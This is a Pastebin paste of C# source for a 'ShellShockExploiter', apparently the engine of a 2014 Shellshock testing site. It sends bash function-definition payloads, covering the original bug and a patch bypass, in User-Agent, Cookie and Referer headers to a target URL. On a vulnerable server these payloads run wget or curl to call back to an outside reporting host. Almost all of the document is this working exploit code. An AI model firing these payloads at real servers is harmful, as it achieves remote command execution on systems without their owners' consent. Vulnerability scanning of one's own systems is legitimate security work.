G2A Many GEOs
SHARE
TWEET

ShellShock.brandonpotter.com

BrandonPotter Sep 25th, 2014 7,935 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Net;
  5. using System.Text;
  6. using System.Threading.Tasks;
  7.  
  8. namespace ShellShockExploiter
  9. {
  10.     public class SSExploiter
  11.     {
  12.         public event Action<string> TestExecuted;
  13.  
  14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
  15.         {
  16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
  17.  
  18.             foreach (var header in headers)
  19.             {
  20.                 // original exploit
  21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
  22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
  23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
  24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
  25.  
  26.                 // new exploit for patch
  27.                 // () { (a)=>\' bash -c "echo date"
  28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
  29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
  30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
  31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
  32.             }
  33.         }
  34.  
  35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
  36.         {            
  37.             ShortWebClient wC = new ShortWebClient();
  38.             string serverResponse = "";
  39.             try
  40.             {
  41.                 wC.Headers.Add(header, bashCmd);
  42.                 wC.DownloadString(targetUrl);
  43.                 serverResponse = "200 OK";
  44.             }
  45.             catch (TimeoutException te)
  46.             {
  47.                 serverResponse = "Timeout";
  48.             }
  49.             catch (WebException e)
  50.             {
  51.                 if (e.Message.Contains("(403) Forbidden"))
  52.                 {
  53.                     serverResponse = "403 Forbidden";
  54.                 }
  55.                 else if (e.Message.Contains("(404) Not Found"))
  56.                 {
  57.                     serverResponse = "404 Not Found";
  58.                 }
  59.                 else
  60.                 {
  61.                     serverResponse = "Error";
  62.                 }
  63.             }
  64.             catch (Exception e) {
  65.                 serverResponse = "No Response or Error";
  66.             }
  67.  
  68.             wC.Dispose();
  69.             wC = null;
  70.  
  71.             try
  72.             {
  73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
  74.             }
  75.             catch { }
  76.         }
  77.     }
  78. }
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top